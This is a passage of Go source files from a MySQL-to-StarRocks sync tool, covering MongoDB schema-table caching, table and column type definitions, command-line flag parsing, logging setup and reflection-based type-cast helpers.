| // init conn 47 | uri := fmt.Sprintf("mongodb://%s:%s@%s", mts.UserName, mts.Password, mts.Uri) 48 | mts.ctx, mts.cancel = context.WithTimeout(context.Background(), 10*time.Second) 49 | mts.conn, err = mongo.Connect(mts.ctx, options.Client().ApplyURI(uri)) 50 | if err != nil { 51 | log.Fatal("new schema tables conn failed. err: ", err.Error()) 52 | } 53 | // TODO LoadMeta 54 | } 55 | 56 | func (mts *MongoTables) AddTableForMsg(msg *msg.Msg) error { 57 | key := fmt.Sprintf("%s.%s", msg.Database, msg.Table) 58 | mts.tablesLock.RLock() 59 | t, ok := mts.tables[key] 60 | mts.tablesLock.RUnlock() 61 | 62 | if ok { 63 | ta := &Table{ 64 | Schema: msg.Database, 65 | Name: msg.Table, 66 | Columns: make([]TableColumn, 0, 16), 67 | } 68 | mts.getColumns(ta, msg.DmlMsg.Data) 69 | if reflect.DeepEqual(t.Columns, ta.Columns) { 70 | return nil 71 | } 72 | mts.unionColumns(t, ta) 73 | return nil 74 | } 75 | 76 | // add coll to colls 77 | ta := &Table{ 78 | Schema: msg.Database, 79 | Name: msg.Table, 80 | Columns: make([]TableColumn, 0, 16), 81 | } 82 | mts.getColumns(ta, msg.DmlMsg.Data) 83 | mts.tablesLock.RLock() 84 | mts.tables[key] = ta 85 | mts.tablesLock.RUnlock() 86 | return nil 87 | } 88 | 89 | func (mts *MongoTables) AddTable(db string, table string) (*Table, error) { 90 | return nil, nil 91 | } 92 | 93 | func (mts *MongoTables) DelTable(db string, table string) error { 94 | return nil 95 | } 96 | 97 | func (mts *MongoTables) UpdateTable(db string, table string, args interface{}, pos string, index int) (err error) { 98 | return nil 99 | } 100 | 101 | func (mts *MongoTables) GetTable(db string, table string) (*Table, error) { 102 | key := fmt.Sprintf("%s.%s", db, table) 103 | mts.tablesLock.RLock() 104 | t, ok := mts.tables[key] 105 | mts.tablesLock.RUnlock() 106 | if ok { 107 | return t, nil 108 | } 109 | return nil, errors.New("get table meta missing") 110 | } 111 | 112 | func (mts *MongoTables) RefreshTable(db string, table string) { 113 | //TODO 114 | } 115 | 116 | func (mts *MongoTables) Close() { 117 | mts.cancel() 118 | err := mts.conn.Disconnect(context.TODO()) 119 | if err != nil { 120 | log.Fatalf("schema tables close conn failed: %v", err.Error()) 121 | } 122 | log.Infof("schema tables conn is closed") 123 | } 124 | 125 | func (mts *MongoTables) getColumns(table *Table, data map[string]interface{}) { 126 | for k := range data { 127 | table.Columns = append(table.Columns, TableColumn{Name: k}) 128 | } 129 | } 130 | 131 | func (mts *MongoTables) unionColumns(cacheTable *Table, msgTable *Table) { 132 | columnsMap := make(map[string]bool) 133 | for _, c := range cacheTable.Columns { 134 | columnsMap[c.Name] = true 135 | } 136 | for _, c := range msgTable.Columns { 137 | if _, ok := columnsMap[c.Name]; !ok { 138 | columnsMap[c.Name] = true 139 | cacheTable.Columns = append(cacheTable.Columns, c) 140 | } 141 | } 142 | } 143 | 144 | func (mts *MongoTables) SaveMeta(data string) error { 145 | return nil 146 | } 147 | -------------------------------------------------------------------------------- /pkg/schema/schema.go: -------------------------------------------------------------------------------- 1 | package schema 2 | 3 | import ( 4 | "encoding/json" 5 | "github.com/juju/errors" 6 | "github.com/siddontang/go-log/log" 7 | ) 8 | 9 | type ColumnType = int 10 | 11 | const ( 12 | TypeNumber ColumnType = iota + 1 // tinyint, smallint, int, bigint, year 13 | TypeMediumInt // medium int 14 | TypeFloat // float, double 15 | TypeEnum // enum 16 | TypeSet // set 17 | TypeString // other 18 | TypeDatetime // datetime 19 | TypeTimestamp // timestamp 20 | TypeDate // date 21 | TypeTime // time 22 | TypeBit // bit 23 | TypeJson // json 24 | TypeDecimal // decimal 25 | TypeBinary // binary 26 | ) 27 | 28 | type Table struct { 29 | Schema string `toml:"schema" json:"schema"` 30 | Name string `toml:"name" json:"name"` 31 | Comment string `toml:"comment" json:"comment"` 32 | Columns []TableColumn `toml:"columns" json:"columns"` 33 | PrimaryKeyColumns []TableColumn `toml:"primary_key_columns" json:"primary_key_columns"` 34 | } 35 | 36 | type TableColumn struct { 37 | Name string `toml:"name" json:"name"` 38 | Type ColumnType `toml:"type" json:"type"` 39 | RawType string `toml:"raw_type" json:"raw_type"` 40 | Comment string `toml:"comment" json:"comment"` 41 | IsPrimaryKey bool `toml:"is_primary_key" json:"is_primary_key"` 42 | } 43 | 44 | type DdlStatement struct { 45 | Schema string `toml:"schema" json:"schema"` 46 | Name string `toml:"name" json:"name"` 47 | RawSql string `toml:"raw_sql" json:"raw_sql"` 48 | IsCreateTable bool `toml:"is_create_table" json:"is_create_table"` 49 | IsLikeCreateTable bool `toml:"is_like_create_table" json:"is_like_create_table"` 50 | ReferTable struct { 51 | Schema string `toml:"schema" json:"schema"` 52 | Name string `toml:"name" json:"name"` 53 | } `toml:"refer_table" json:"refer_table"` 54 | IsSelectCreateTable bool `toml:"is_select_create_table" json:"is_select_create_table"` 55 | SelectRawSql string `toml:"select_raw_sql" json:"select_raw_sql"` 56 | IsDropTable bool `toml:"is_drop_table" json:"is_drop_table"` 57 | IsRenameTable bool `toml:"is_rename_table" json:"is_rename_table"` 58 | } 59 | 60 | func (t *Table) GetTableColumnsName() []string { 61 | columns := make([]string, 0, 16) 62 | for _, column := range t.Columns { 63 | columns = append(columns, column.Name) 64 | } 65 | return columns 66 | } 67 | 68 | func (t *Table) FindColumn(name string) int { 69 | for i, col := range t.Columns { 70 | if col.Name == name { 71 | return i 72 | } 73 | } 74 | return -1 75 | } 76 | 77 | func (t *Table) DelColumn(name string) error { 78 | colIndex := t.FindColumn(name) 79 | if colIndex > -1 { 80 | t.Columns = append(t.Columns[:colIndex], t.Columns[colIndex+1:]...) 81 | log.Infof("table: %s.%s delete column: %s", t.Schema, t.Name, name) 82 | return nil 83 | } 84 | return errors.New("column: %s not found") 85 | } 86 | 87 | func (t *Table) ToString() string { 88 | if t == nil { 89 | return "" 90 | } 91 | marshal, err := json.Marshal(t) 92 | if err != nil { 93 | return "" 94 | } 95 | return string(marshal) 96 | } 97 | -------------------------------------------------------------------------------- /pkg/utils/file_path.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "github.com/siddontang/go-log/log" 5 | "os" 6 | "path/filepath" 7 | ) 8 | 9 | func GetExecPath() string { 10 | ex, err := os.Executable() 11 | if err != nil { 12 | log.Fatal("get exec path error: ", err) 13 | } 14 | exPath := filepath.Dir(ex) 15 | return exPath 16 | } 17 | -------------------------------------------------------------------------------- /pkg/utils/help.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "flag" 5 | "github.com/go-demo/version" 6 | "github.com/siddontang/go-log/log" 7 | "os" 8 | "path/filepath" 9 | ) 10 | 11 | type Help struct { 12 | printVersion bool 13 | ConfigFile *string 14 | LogLevel *string 15 | LogFile *string 16 | OutputType *string 17 | Daemon *bool 18 | HttpPort *int 19 | } 20 | 21 | func HelpInit() *Help { 22 | var help Help 23 | help.ConfigFile = flag.String("config", "", "go-mysql-starrocks config file") 24 | help.LogLevel = flag.String("level", "info", "log level") 25 | help.LogFile = flag.String("log-file", "go_mysql_sr.log", "log file path") 26 | help.OutputType = flag.String("type", "starrocks", "output type: starrocks, output") 27 | help.Daemon = flag.Bool("daemon", false, "daemon run, must include param 'log-file'") 28 | help.HttpPort = flag.Int("http-port", 6166, "http monitor port, curl http://localhost:6166/metrics") 29 | flag.BoolVar(&help.printVersion, "version", false, "print program build version") 30 | flag.Parse() 31 | // 这个需要放在第一个判断 32 | if help.printVersion { 33 | version.PrintVersion() 34 | os.Exit(0) 35 | } 36 | if *help.ConfigFile == "" { 37 | log.Infof("-config param does not exist!") 38 | os.Exit(0) 39 | } else { 40 | abs, err := filepath.Abs(*help.ConfigFile) 41 | if err != nil { 42 | log.Fatal("-config abs error: ", err.Error()) 43 | } 44 | *help.ConfigFile = abs 45 | } 46 | if *help.OutputType != "starrocks" && *help.OutputType != "output" { 47 | log.Infof("-type param value is wrong, see help!") 48 | os.Exit(0) 49 | } 50 | if *help.Daemon { 51 | if *help.LogFile == "" { 52 | log.Infof("daemon mode, must include -log-file param!") 53 | os.Exit(0) 54 | } 55 | } 56 | return &help 57 | } 58 | -------------------------------------------------------------------------------- /pkg/utils/log.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "github.com/siddontang/go-log/log" 5 | "os" 6 | "path/filepath" 7 | ) 8 | 9 | func LogInit(help *Help) *log.Logger { 10 | var l *log.Logger 11 | if *help.LogFile != "" { 12 | // 写入文件 13 | abs, err := filepath.Abs(*help.LogFile) 14 | if err != nil { 15 | log.Fatal("log-file abs error: ", err.Error()) 16 | } 17 | *help.LogFile = abs 18 | logH, _ := log.NewFileHandler(*help.LogFile, os.O_CREATE|os.O_WRONLY|os.O_APPEND) 19 | l = log.NewDefault(logH) 20 | } else { 21 | // 输出到控制台 22 | logH, _ := log.NewStreamHandler(os.Stdout) 23 | l = log.NewDefault(logH) 24 | } 25 | log.SetDefaultLogger(l) 26 | log.SetLevelByName(*help.LogLevel) 27 | return l 28 | } 29 | -------------------------------------------------------------------------------- /pkg/utils/type_cast.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "github.com/juju/errors" 5 | "reflect" 6 | ) 7 | 8 | func CastToSlice(arg interface{}) (out []interface{}, ok bool) { 9 | slice, success := TakeArg(arg, reflect.Slice) 10 | if !success { 11 | ok = false 12 | return 13 | } 14 | c := slice.Len() 15 | out = make([]interface{}, c) 16 | for i := 0; i < c; i++ { 17 | out[i] = slice.Index(i).Interface() 18 | } 19 | return out, true 20 | } 21 | 22 | func TakeArg(arg interface{}, kind reflect.Kind) (val reflect.Value, ok bool) { 23 | val = reflect.ValueOf(arg) 24 | if val.Kind() == kind { 25 | ok = true 26 | } 27 | return 28 | } 29 | 30 | func CastSliceInterfaceToSliceString(a []interface{}) ([]string, error) { 31 | aStrings := make([]string, len(a)) 32 | for i, c := range a { 33 | name, ok := c.(string) 34 | if !ok { 35 | return nil, errors.Trace(errors.New("should be an array of string")) 36 | } 37 | aStrings[i] = name 38 | } 39 | return aStrings, nil 40 | } 41 | --------------------------------------------------------------------------------